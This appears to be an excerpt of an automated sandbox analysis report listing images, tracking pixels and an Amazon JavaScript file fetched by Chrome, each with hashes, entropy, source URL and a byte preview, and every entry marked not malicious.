                                                                                                                                                                                                                                                                Entropy (8bit):7.505726286026499
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rfGvl6wUgY7J4NlXPFWECtllV/7m0hFZcQXZpS:TGGvl/Y7JWlfFDgLV/77hjHbS
                                                                                                                                                                                                                                                                MD5:E9D967B5E9E72403AA700242B6EED0D7
                                                                                                                                                                                                                                                                SHA1:6C8CFFBC74874AEE67B9778F27C02BB0C7E5E429
                                                                                                                                                                                                                                                                SHA-256:B73864120BD7B4FD8E933ED1B8BA1A08B861E3F522EFDD8467FD8DBAD126A8A1
                                                                                                                                                                                                                                                                SHA-512:9660B28027DAA95874CF33097925905921E43208F3E4D60CCBC698E307653F77B4796FB5FAFBDD8859E2B1F1A20C90EAB598860CFB5A6979F1CA80D3EF7083D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........y.................................................!..1Q."Aaq...2.....BR....3S.......................................................?..............%%..y$`.v.{.i.....qJ:GW.c...8\.%.....a"./.pvq.A.o..cq......7.F.M....k8.x......qH.E8.h..i...~M?.$...4...b..!d...0.E....}Q}<..................fm.....k../...Wh.L.p.#..c...;t.....f]X.g.....g.....~.H.....g.H..[.<.%...w...l.. ...d4.4K&AJl.)..<.0...;.4.N.Q..oI=;.....Vb..~.....C.6.....KIx...b.............3q....xk.)T..;.......Cn.M.C...^v..Z.G....FM.+g).f...8...F.."..3..<...&....`...6.#C.bp.m%.~...Fp|.._...{!/....?R..^K.../z.....uu?~.Dnl}..{..+..Tg..KDYw..4..)U(.....'...>.y.n..L.v.3+....&....r..h.M..u`.5?...u~.#.....'.0....~....@.@........8.{.l........{....P8K$..y.Q....K..u.O...r..`.......\....Fh.>..y...X:/..6.....8..s.O...t...mx..(.\[]
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):263193
                                                                                                                                                                                                                                                                Entropy (8bit):5.398223615352051
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:14+ME+AneR9yT5VoSjzppWCqfgEpNg4syp1kAs6aOb8lY6HEbrcaJn9Bed7oX/z4:14+ME+AnpT56SjzppWCqfgEpNg4BrkAE
                                                                                                                                                                                                                                                                MD5:51D454DF00DBE6104CD24476C0405FF3
                                                                                                                                                                                                                                                                SHA1:92BDEFC136C32CB8009F61503DB294A8CB0698CB
                                                                                                                                                                                                                                                                SHA-256:E9681976FDD4F0051427351564B6922798CDD0EA3E1F6FFD868A55D6F7F261BF
                                                                                                                                                                                                                                                                SHA-512:E9AC988864AA3CC325AAF53F949F59832E5E31C012AB383018825B0E4C80764F9A1D55B750EB833528D70A86D221440966F9B7BBFABAE7F7F7BCEA6F6EEF4A88
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/81DWyqy1KcL.js?AUIClients/FWCIMAssets
                                                                                                                                                                                                                                                                Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 213x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11832
                                                                                                                                                                                                                                                                Entropy (8bit):7.959588886949231
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:oEOR05NsT7nQjPL9b36T+WlUyLw9267BP9abW2pF19ARRtj0cFc3a0y+W/GTOe:oEQ05c7QPlKBz6sHF19ARRF0cSDy+kle
                                                                                                                                                                                                                                                                MD5:44AEF71A3380C0D38C108ED757D256E6
                                                                                                                                                                                                                                                                SHA1:A5BC06F43181E4B6C18868DF662A60492D91F6AF
                                                                                                                                                                                                                                                                SHA-256:18B20FD5DBB795C53BCFF747F5FA365E3DCE19880A09780BE7BBCB2B4959A758
                                                                                                                                                                                                                                                                SHA-512:F593D23518AE88D3D210EBDC65DC63CAB13403882FF598A171474B7BDB2A5E9292E1BF7B04E7B535EDCC098E537DD776FDFEAA55EC8F249AAFB9BB57BB204413
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61OaibCCrKL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.A."2Qaq.#R......3Br.S.$4Tbc...C............................................................!12AB..aq..............?..tQE.E.P.QE.E....Z..Fn.b.{.c.H.E..^...]F..R..Y.H...P..PK.N=)o._.O.(&....)Ys..../u.4.../.'...../q.B=g6.g.p..!.A....H....,.d ......g......?s....G.7.y...X.`.............~9....gU.......s.....~.....=/k............j.I.gP.B.h.. |.a...==f..t.G..UW......g..i...z~..S].D.t.......a.b.*..};...{.!.$.....VB.9..jVw.x.Y..U......Fj...f8!......!sZs.F3T..{..2..30..|...D..1y.=.....X."..52C.'.,..E.k..F#.....W9.fa..I..&m.y.Y.k.n_P....g.A.@............*O.......W...[j....6Q..`G.H. .lt..2*C..R.8fs....TA.]...q....1....{.?f\o.l.on..i_TW./V.....e..U....S....E.P.QE.E.P|.d..IX" %..UP9$....N...z[C%..d.KU.A.HJB.s.3zCXz..}:vqa..yv.A4....<|....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10733
                                                                                                                                                                                                                                                                Entropy (8bit):7.885934182718208
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Ym0kcHGqaV4LMM67mdanbf/gmmj2HiZrPRGmU3r8r93rZlS2oztBfubDX8PbmtYD:PoHGqaV4LxonjgmFkrPQTr8r9jSR1ABC
                                                                                                                                                                                                                                                                MD5:41E60F7A1D6139539601FABD8F36C3CB
                                                                                                                                                                                                                                                                SHA1:1F3F310B59336A8AF90875ED9BB4B09AC2185ED3
                                                                                                                                                                                                                                                                SHA-256:BAA6F9ACD8469789404573EC33A27D763E9AA979B6831EA39D47528D3BD25028
                                                                                                                                                                                                                                                                SHA-512:450E6B65F2D43E59882186BDEB4CAF335F63C4574C33BDBC4C880E53EA9839466F0E003B947A04058530F7554555FB4EF1E5A2C3A2A7A36B5C09AEF326402077
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................x8.}W.=.).7*y&-......{................}..(....:....kQ<..s^.GN...&...........W...V.9w.:........z....2..V........8..t.F/D#...........y...6...).....yP.v0.} H....k...vd........3k......4$t.s.........{..0z........>..}...9.vm..|..M........I.W.o.........~.S....../\R..g...)q.;..x..j..>.G@.....C.o]..l......0......k.[D...zp.M?..8O....u<..[.4.rz..`......Ku...*.>r.'..i...y.=e6uU.k...S..z3..=.....6<..[.Tq.f...V....w.H.....7o~k.....z...z.....r..*....d..K,2By.....^k.....X..G.2.m<f/z..\Ww`..^....oS..y..5.48..`.@..#....^.b....R.RxnK....<.....x{.<..!.].G.....;.^?....W...t......].?=.^....7..|...,}..y.....I.y5..>..9..R. .....X.j....B...2..f....iiOq..S\.D..~....EE.....Wv6S..k.....YN.^lW.R.-<A..\......q.............7z..i...h..@.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1830
                                                                                                                                                                                                                                                                Entropy (8bit):7.39866260559553
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TRe+0Cm12hjGo+ZC8OozUbEyqKoY7R0QhJV9CBHl2SahfoNNPsYlFuq2S5lyUp8y:TT0r12goSjnzVACBH0SOzqn5lhuy7KAH
                                                                                                                                                                                                                                                                MD5:E3A2870D271E42B58BC833B606FBFB7E
                                                                                                                                                                                                                                                                SHA1:404033A164A9BA85D3FFDFFD6C045C3DB426A267
                                                                                                                                                                                                                                                                SHA-256:7FD6E371A1B972ECA204772A668D0F3380DEAA66058730F4F344699AFF318633
                                                                                                                                                                                                                                                                SHA-512:D6BBE79080A0CE86B8E08736478BE1BDF2E34E7AD5E0933A8EDE458CD7EA56C975CD03D942F1AEE8CA9496D2EE27845F65B75A967A372FDC71A11AA363ED6AD3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........w..................................................!1.2AqQa...#...."4Rr.Bb..3.....................................................?............v1..[4.........Z.<N.H..}...{...e..>{..y.%.#^7...%h.6.Z5...t..w..k'..5..i...s.Tvrz.eG.....8.{...e\..H...................+...a..P.......<.O..S.(..T%e.x.D.[s..H..5..s...*.....d510N.v......B.\....H.....k.n9W...*K..;../.......V.x.....Q.RqR....F.3...0.`gR.I%........:...iK..EGk*.tLE.r.%"..................<.tjT...m..fsr.(..k....... .s.........tH...%"..}......`.%.g...M..{.N1....{$....O...`g.vt..#.55...p.^..]...`gyK..$.o*.tJE.m>................C...%e....H.vq.^s..T..H...U..... ....'.4.....'($..S.F..g....OW.s....i}@..Au)O...E...........p8HF......(I).)(Z'O...g..Y.I...i.......|.......l.....bkA.E...+k}...xk..O.......EIK./.g.<.U:\..{DP....x.m/...Q.t
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12378
                                                                                                                                                                                                                                                                Entropy (8bit):7.859662436851788
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:G3tYxQbJitEn6BI4K5C7pltAOXcIVou88zED+:GdYWV2GV5OT5VouvzED+
                                                                                                                                                                                                                                                                MD5:F002997F01FFD9080201C730FC433ACB
                                                                                                                                                                                                                                                                SHA1:46205D85BB9B4C0E1B57EA53708C55A9C064E1BD
                                                                                                                                                                                                                                                                SHA-256:5D7382E6D5B13212B2072F1B5CC7C084ED8DE9850C8B5317BEA0300138B2D811
                                                                                                                                                                                                                                                                SHA-512:CB67799F319FC1ABB42E1CC191A058FD994DEAEAD0FD4E5C0EB10B32E250AD10055F0FB32B28B28E441296E3FBE9E35F7D053476619ED787F2905B039037B4D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................................................................................................................3..d.{.tSRX*.ZJ..Zj.Z..Z..Z..Z..Z...ZJ...!m*...iw@..........D...#....<}5.....W...............Yb.....I&...W.^.=.4s..?.::'.......'.................i..6......u'.N ...L...L/...hq.X.oS,.T..c.../.zo.[.,/.k.C|...K.W....G........\wH..........)x..)^.1....A.W..v...S.kI......K.....".?..`.U.......Y..4.{...j$:*..f.W2..7t..=. ..........j.1...z.v.C.....;F;*.jW........yM.4Rx._W.....r.........X..LCS..j.....#X...y....<..q..........Rpi....#.K....9.Lc.k.u.s...N.%.Y..z(.."Up.f%Eo.'.=.....-ab.q+U...j?...6.`l<+.:_..w................@+...=...A.........a.nz.6.......x...9.....]..[..o.l,=.........!....g*.'-u/.w@..........(:.}^W....{jv...s.6Q..N.UU.e.JV
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 202x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6884
                                                                                                                                                                                                                                                                Entropy (8bit):7.9357329609587595
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:T4grF+vcl8UtuhDgap7AU+4VKh2Pe9W+h/YzoEw7VD6:EgR+kGmmVAzUa9cYAzoEwY
                                                                                                                                                                                                                                                                MD5:4F7191B90A24C9F0871F8820BC4D5B00
                                                                                                                                                                                                                                                                SHA1:D77E6CACFF2B8E456624185633398AE82D55E255
                                                                                                                                                                                                                                                                SHA-256:F8DA693DDC2FBC184DF675B0F51BAEE0A394628F99CA342F00A70AA814CAC79D
                                                                                                                                                                                                                                                                SHA-512:549CEB39DBA7F21FBDC4E444DFB8D8F2D3DC8DE0BBA3D7D333809CC0B4D2FAE42A0364858AE2503478681E2F92BAF428974BB06A0DD7CD4E13C92F39154E2D67
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.A..Q"23aq.......BRUr......#bs......4eCS%D...............................................R..1!Q."AB.............?..]..-....`@.;.;.FN.7.Q....<E.[...*.U.Z....u..K<.0...u.9...F...4.).l.......G.5.........^<6W.SzZm4s..w.._.9.E5.).G....!>..k/.N.&....4....+!.+....j..).j$..:.......{j..u..Q...hF$.Gz.g...".GJg.}..R.tk..H..Q....g.........a.:".GJu...0.I..,...5'VT.QE.P.......UHU..|.....UP..o......4..Yl..O*...Z(.....J+(...+*(1......YQA..YRE.1.....+8...6>.>z......=HV.4QE.P.<.....UR.|A.[......kx.$.W....e}.{P%-...EeE.P.--..R..,P..".(.JH......)"...i+*J.6^.>z.L,.*|.....QE.P...(.....U...(......kx.$.W....e}.{P..R.%h..f.9.q-.c2...<...N*..lQ....l.EO..o..4..(HZHRH..H4.J.....ik ..q+T.....EBp.~.{.....%..f.R2..\..%..........[!+CIh].A....>.......4.4.....d-%
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D41612%26at%3D41612%26t%3D1723469044610%26csmtags%3DstartVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41611
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 154x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12700
                                                                                                                                                                                                                                                                Entropy (8bit):7.9640877994381185
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:hvGAVlTylE+EmnML3dHKjQpxHbPYfqxIyFhx:hvGA7UrMZqQ3bQyxbhx
                                                                                                                                                                                                                                                                MD5:E8464EE006AFB4B5D22949790F99C342
                                                                                                                                                                                                                                                                SHA1:2D96918329209FE83604EA6E79C2F378DCB7C86A
                                                                                                                                                                                                                                                                SHA-256:D51927AB3129115FC9D4FBA85668121C9FA6604FF2EDC92E36AB6275078E5C48
                                                                                                                                                                                                                                                                SHA-512:4A0A402000CE9271CF5B333F439994FD6CDC9B8A17CCDD4654CF46A3A54616CF800D510FC2F6804E7931C4DE2947892ED4F727A7D6FCF95D94284BA93D0D4D54
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.."1AQ..2aq..4B..#3.......RSbt...$56rsu....C......................................................1.!Q.Aaq...."235Rr.....#..b......%BC............?....[...3\.4.....()...h^R9......8.\.d.*&&L.m.}Q...h.7(....0..W.vCH.-.a....-..z...6;.'.-.Jb@7.0H.H .e..>..J...8<........d.;.d.c5.I.=3gt..T.i..BX.3...\.......I.h....y._.......!.....$..'.9...._H...C.l....W.N..L...].b..p.W..8..(.H..a...SQ....x%.....H...6]...n.1.......}.-.u.j;..8.....o...D........>....a.<.....?...c./.'JY+....;@..8.Z.......S3kzGEb.AH.GR..E.D-.,....>.@63.O.b.".h?..V5.f..eg..*...7.j....d!.E..u...F^Q.....S....6..0..U......!^.(....P.k...~.......oU...."g.........V.G....h?S...$......>.....j......rw.1.............joIY.A.hl....f`..bC.j@.f...f.L.{..7;.....y.........j.`
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26m%3D1%26sc%3Dcsa%3AbrowserQuiteMut%26pc%3D3918%26at%3D3918%26t%3D1723469077936%26csmtags%3DbrowserQuiteMut%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:3919
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):147587
                                                                                                                                                                                                                                                                Entropy (8bit):7.413324190072989
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:NNmoSlRkzlkCpuIY78pLyMOh8lSjb+bFETmpJVG:C9kzyCphpLyMO3jbEF0eJVG
                                                                                                                                                                                                                                                                MD5:B6ABB9E8CA094B6421F93430355DD50B
                                                                                                                                                                                                                                                                SHA1:599D8A7861DD5BB030FEF780DA2F32CF13982AE8
                                                                                                                                                                                                                                                                SHA-256:2A7DCBB26F9FA38C140F06924E6780A169F6BF8E4CC084844BEF249168879A5B
                                                                                                                                                                                                                                                                SHA-512:0581D5F5BCF41865523BCF3993FD285E83BDB9DA2637300362221F82D6A0784543DA94505C98CCD485BF484194E2D1064E382EC33E6A866CF0D56770CD81C71B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71K6QNOFIQL._SX3000_.jpg
                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a5ecbaa6-ca8a-48b3-9ab9-0568866a55c5" xmpMM:DocumentID="xmp.did:5DB9079E4C1511EF856A94285C069192" xmpMM:InstanceID="xmp.iid:5DB9079D4C1511EF856A94285C069192" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:436fb9fc-aa5c-4a95-a409-6aae293d594f" stRef:documentID="adobe:docid:photoshop:e65d89a6-917f-e949-b271-9d2c7c650dc3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.........................!..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 194 x 295, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):45977
                                                                                                                                                                                                                                                                Entropy (8bit):7.985058314720174
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Ox2kO+0B5izHhTPdZVliVcR3+/ku/iUYi09ERbCC4lxOQ3JZT9AlpsyjSB:OAkp45izBXfNR35u/izi2GbHU3X9An8B
                                                                                                                                                                                                                                                                MD5:A824C7A90E2C465DA4C4DB9FD9FC15E4
                                                                                                                                                                                                                                                                SHA1:36F46FBD4D03D1E55BC0B0D4381D351620750532
                                                                                                                                                                                                                                                                SHA-256:6641FF165206F0F54CD94518DED93DFCBFC7436A806B0DE96991CB3DA4032A8B
                                                                                                                                                                                                                                                                SHA-512:AF530AF8E111A8B7DA4C2776253E6BDFD295E2A84A11EBCC020024E6B8364C6D75AC2C8BAE725D6441036BB3F163E74410F87F9C9B031417F16DA330C5C708DC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......'.............gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D365%26pc%3D3925%26at%3D3925%26t%3D1723469077943%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:3926
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):1844
                                                                                                                                                                                                                                                                Entropy (8bit):7.368092945546424
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0rH33UVr2aM48sbuHFHe+1mqAiroO7vvP0Iq:T2DaM48sqlZDroevvP0Iq
